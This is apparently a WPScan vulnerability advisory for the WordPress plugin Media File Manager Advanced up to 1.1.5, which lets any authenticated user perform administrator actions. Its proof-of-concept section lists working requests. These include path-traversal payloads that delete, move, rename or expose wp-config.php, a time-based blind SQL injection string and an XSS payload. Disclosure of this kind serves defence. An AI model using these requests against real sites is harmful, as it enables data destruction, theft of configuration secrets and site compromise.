Media File Manager Advanced <= 1.1.5 - Multiple Vulnerabilites



Description
Media File Manager Advanced suffers from executing administrator actions by any authenticated user due to weak permissions checking.

An attacker is able to delete/update posts, Creating/Removing/Listing Directories, Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site Scripting.
Proof of Concept
Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17

MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER

folder exists: http://domain.tld/wp-contents/uploads/EVEXFOLDER

RMDIR (Dir Must Be Empty)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
dir=EVEXFOLDER&name=

not found: http://domain.tld/wp-contents/uploads/EVEXFOLDER

UNLINK
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
dir=../../&name=wp-config.php

no more wp-config.php

Blind SQL INJECTION
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ) 

Sleeps for 10 seconds

XSS
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id="</button><script>alert(1)</script>

Alerts(1)

Update Post
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
id=34&title=New_Title&caption=bla&description=Dummy Description

Move Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
dir_from=../../&items=wp-config.php&dir_to=

now wp-config.php is in /wp-content/uploads/wp-config.php

Renaming Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
dir=../../&from=wp-config.php&to=wp-config.txt

now wp-config.php is renamed to wp-config.txt 

Directory Listing 
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
dir=../../

will list all files and directories

Affects Plugin

References

PACKETSTORM 131949
URL http://web.archive.org/web/20150912142109/http://research.evex.pw/?vuln=16

Classification

Type MULTI

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 1190
Verified No
WPVDB ID 7983

Timeline

Publicly Published 2015-05-13 (over 3 years ago)
Added 2015-05-13 (over 3 years ago)
Last Updated 2018-08-29 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.